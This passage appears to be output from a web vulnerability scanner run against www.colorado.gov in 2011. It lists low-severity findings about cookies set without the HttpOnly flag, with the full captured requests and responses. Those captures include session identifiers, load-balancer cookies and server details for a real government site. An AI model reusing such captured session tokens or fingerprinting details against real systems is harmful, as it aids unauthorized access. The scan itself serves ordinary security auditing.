GET /cms/coloradogov/images/img_rightArrow.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:06 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:42:10 GMT
ETag: "660010-a4a-48a1aa3e02080"
Accept-Ranges: bytes
Content-Length: 2634
Content-Type: image/gif
Set-Cookie: BIGipServer=180355082.20480.0000; path=/

GIF89a..d...............Yj..........F........u........`..y.......V..h....m.............k.........u...............p...........".............. ..b................................O...........|..X.....Z.
...[SNIP]...

14.478. http://www.colorado.gov/cms/coloradogov/images/img_rightArrow_disable.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/img_rightArrow_disable.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/img_rightArrow_disable.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:06 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:42:09 GMT
ETag: "660011-a53-48a1aa3d0de40"
Accept-Ranges: bytes
Content-Length: 2643
Content-Type: image/gif
Set-Cookie: BIGipServer=180355082.20480.0000; path=/

GIF89a..d...........................p...........".............. ..b.............................W.....O...........}..X.....Z..^..l.."..............^...........F..Z...........d.....&...................
...[SNIP]...

14.479. http://www.colorado.gov/cms/coloradogov/images/tab_CBE2-blu.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_CBE2-blu.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_CBE2-blu.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:55 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 22:50:10 GMT
ETag: "66009f-216-46bf22e4e8c80"
Accept-Ranges: bytes
Content-Length: 534
Content-Type: image/gif
Set-Cookie: BIGipServer=348127242.20480.0000; path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

14.480. http://www.colorado.gov/cms/coloradogov/images/tab_agHiLt-clr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_agHiLt-clr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_agHiLt-clr.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030; JSESSIONID=cx3hS880vVX_KdjjM_; BIGipServer=BiFPL5JoVeDod4AHgshLK90xd+63v3peA8ZTSM2rKMnDYWoxyqA+/BPR9lH3JnCE2BJL8yIaqMon8w==

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:59 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 22:50:07 GMT
ETag: "6600a8-845-46bf22e20c5c0"
Accept-Ranges: bytes
Content-Length: 2117
Content-Type: image/gif
Set-Cookie: BIGipServer=348127242.20480.0000; path=/

GIF89a........F..G..H..^..M..P..S..I..K..T..L..W.....Z..\..Y..^.._..^..U..O..[..R..G..H..N..Z..Q..V..]..`..4.._..]..X..Y............................LLL...^^^&&&UUU;;;bbbOOOCCCeee...RRR"""......YYY@
...[SNIP]...

14.481. http://www.colorado.gov/cms/coloradogov/images/tab_alerts-red.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_alerts-red.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_alerts-red.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:55 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 22:46:46 GMT
ETag: "8c1536-fe-46bf22225c180"
Accept-Ranges: bytes
Content-Length: 254
Content-Type: image/gif
Set-Cookie: BIGipServer=515899402.20480.0000; path=/

GIF89aT..........rr................{{........................!.......,....T......0.I..8....@(.di.h:~...0.fqm.3v.|.....G.m
.....e.....jZM..`..^.>.@0..h`p.A..........    .|n9D..[.B.{|.Hvn[J..M..[..[T....
.
...[SNIP]...

14.482. http://www.colorado.gov/cms/coloradogov/images/tab_govInt-govTrns-blu.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_govInt-govTrns-blu.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_govInt-govTrns-blu.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:01 GMT
Server: Apache
Last-Modified: Tue, 15 Feb 2011 23:54:31 GMT
ETag: "8c2b46-68f-49c5ae2afbbc0"
Accept-Ranges: bytes
Content-Length: 1679
Content-Type: image/gif
Set-Cookie: BIGipServer=180355082.20480.0000; path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

14.483. http://www.colorado.gov/cms/coloradogov/images/tab_howdoi-blu.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_howdoi-blu.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_howdoi-blu.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:53 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 14:12:45 GMT
ETag: "8c153f-fd-46beaf3e17140"
Accept-Ranges: bytes
Content-Length: 253
Content-Type: image/gif
Set-Cookie: BIGipServer=515899402.20480.0000; path=/

GIF89ae.............U........................................!.......,....e......0.I..8..... .di.h..*..p,....x......V/.,.5..`yH..._....    ....YX...v..P..Gua!.W..`......{_.(.Kb|.~.UX..{.stNO.|.w.....C..
...[SNIP]...

14.484. http://www.colorado.gov/cms/coloradogov/images/tab_infofor-blu.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_infofor-blu.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_infofor-blu.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:53 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 14:11:49 GMT
ETag: "8c1542-f3-46beaf08af340"
Accept-Ranges: bytes
Content-Length: 243
Content-Type: image/gif
Set-Cookie: BIGipServer=180355082.20480.0000; path=/

GIF89a..............U................!.......,...............0.I..8....`(.di.h.z...p,.g..x..,e.........Q........Q.....S....Ylv.... .6.......jU....|?.-..RjAbaz..F.c.k..S.....1..c...)...
....d....i...
...[SNIP]...

14.485. http://www.colorado.gov/cms/coloradogov/images/tab_services-blu.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_services-blu.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_services-blu.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:53 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 14:11:57 GMT
ETag: "8c1545-bd-46beaf1050540"
Accept-Ranges: bytes
Content-Length: 189
Content-Type: image/gif
Set-Cookie: BIGipServer=515899402.20480.0000; path=/

GIF89ab................F.!.......,....b......................QH..y.........)...yB.>`.    o.... 6.....t0+..'....\.1t..."LN..i.:.E..o.z..u[.S....w..3B..6........)'iDYi.....9..*:JZjz....ZZ..;

14.486. http://www.colorado.gov/cms/coloradogov/images/tab_services-clr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_services-clr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_services-clr.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:53 GMT
Server: Apache
Last-Modified: Tue, 04 Mar 2008 17:58:41 GMT
ETag: "6600bb-525-447a041325640"
Accept-Ranges: bytes
Content-Length: 1317
Content-Type: image/gif
Set-Cookie: BIGipServer=348127242.20480.0000; path=/

GIF89ab.........bbb@@@!!!eeeFFF...UUUssshhh....{.RRRPQQ888......>>>yyy;;;CCC...III]]]***......666333222$$$000......(((..........Z..^..Y.._..\..^..U..[..Q..O..H..G..R..N..]..V..Z..].....X..`.._..-..Y..
...[SNIP]...

14.487. http://www.colorado.gov/cms/coloradogov/images/tab_stateLeg-blu.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_stateLeg-blu.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_stateLeg-blu.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:55 GMT
Server: Apache
Last-Modified: Thu, 25 Mar 2010 20:57:11 GMT
ETag: "8c2b86-169-482a64a6297c0"
Accept-Ranges: bytes
Content-Length: 361
Content-Type: image/gif
Set-Cookie: BIGipServer=515899402.20480.0000; path=/

GIF89a........................................................A..............................................!.......,...........`$.di.h..l..p,.Sm.x..|....P83...r...K..tJ.=I..v{.....x.%~..t.lK0D
....
...[SNIP]...

14.488. http://www.colorado.gov/cms/coloradogov/images/tab_statenews-blu.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_statenews-blu.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_statenews-blu.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:55 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 14:12:06 GMT
ETag: "8c1548-bd-46beaf18e5980"
Accept-Ranges: bytes
Content-Length: 189
Content-Type: image/gif
Set-Cookie: BIGipServer=180355082.20480.0000; path=/

GIF89ar..................!.......,....r.......................`.....&.....l..........~r..O.L.{.....
.... ...........E.>q.Vp..Yw.P..#g...>&.d..G..#H.g...xG.......T7.6......)...*::Xj:.*Z..;

14.489. http://www.colorado.gov/cms/coloradogov/images/tab_statenews-clr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_statenews-clr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_statenews-clr.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:55 GMT
Server: Apache
Last-Modified: Tue, 04 Mar 2008 17:59:01 GMT
ETag: "8c1549-548-447a042638340"
Accept-Ranges: bytes
Content-Length: 1352
Content-Type: image/gif
Set-Cookie: BIGipServer=180355082.20480.0000; path=/

GIF89ar......................\..Y..Z.....^.._..^..[..Q..U..O..H..N..V..R..G..Z..`..].._..]..X..Y.W&._...........&........LLL&&&...;;;UUU......OOO999"""CCC...^^^bbb@@@RRR......666JJJoooGGGeee555???.
...[SNIP]...

14.490. http://www.colorado.gov/cms/coloradogov/images/tab_traffic-blu.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_traffic-blu.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_traffic-blu.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:02 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 14:12:15 GMT
ETag: "8c154f-bd-46beaf217adc0"
Accept-Ranges: bytes
Content-Length: 189
Content-Type: image/gif
Set-Cookie: BIGipServer=515899402.20480.0000; path=/

GIF89aX................S.!.......,....X.............\........x.H.`S.jy2..g-..o#.z..>..    ..... ...&&.T.........\..K.V._aX...vkm..T..s7<.(..w.T........4.S.p...7..x..0YSiy    ...y3.*:JZjz.....Z..;

14.491. http://www.colorado.gov/cms/coloradogov/images/tab_weather-blu.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_weather-blu.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_weather-blu.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:01 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 14:12:38 GMT
ETag: "8c1552-301-46beaf376a180"
Accept-Ranges: bytes
Content-Length: 769
Content-Type: image/gif
Set-Cookie: BIGipServer=180355082.20480.0000; path=/

GIF89aa.............S...................................................................................................................................................................................
...[SNIP]...

14.492. http://www.colorado.gov/cms/coloradogov/images/tab_weather-clr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /cms/coloradogov/images/tab_weather-clr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/coloradogov/images/tab_weather-clr.gif HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=297861130.36895.0000; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:01 GMT
Server: Apache
Last-Modified: Tue, 04 Mar 2008 18:00:18 GMT
ETag: "8c1553-4b5-447a046fa7080"
Accept-Ranges: bytes
Content-Length: 1205
Content-Type: image/gif
Set-Cookie: BIGipServer=515899402.20480.0000; path=/

GIF89aa........5WG.{{{......ccc........CCB.^..\..[..Y.....Q.KLM.U.RI.;;;SSS.O..G.eR.............|..$$#rrr............x...........YUF......mmm{b....YYYhig...442.....T......]]]...;3.....k......[.....ec
...[SNIP]...

14.493. https://www.colorado.gov/apps/dps/mvvs/public/entry.jsf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.colorado.gov
Path:   /apps/dps/mvvs/public/entry.jsf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/dps/mvvs/public/entry.jsf HTTP/1.1
Host: www.colorado.gov
Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030; BIGipServer=515899402.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:21:46 GMT
Server: Resin/3.0.19
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: JSESSIONID=bb1Yl5CUrn27evjjM_; path=/; HttpOnly
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServer=7fjIXX1aTzGr3LYHgshLK90xd+63v7WQuTv+v/YdrkyryilxVTd5vQ+ArfW4Hip1clZP7Myw93v9sw==; path=/
Content-Length: 8075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

14.494. https://www.colorado.gov/apps/feedback/servlet/begin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.colorado.gov
Path:   /apps/feedback/servlet/begin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/feedback/servlet/begin HTTP/1.1
Host: www.colorado.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
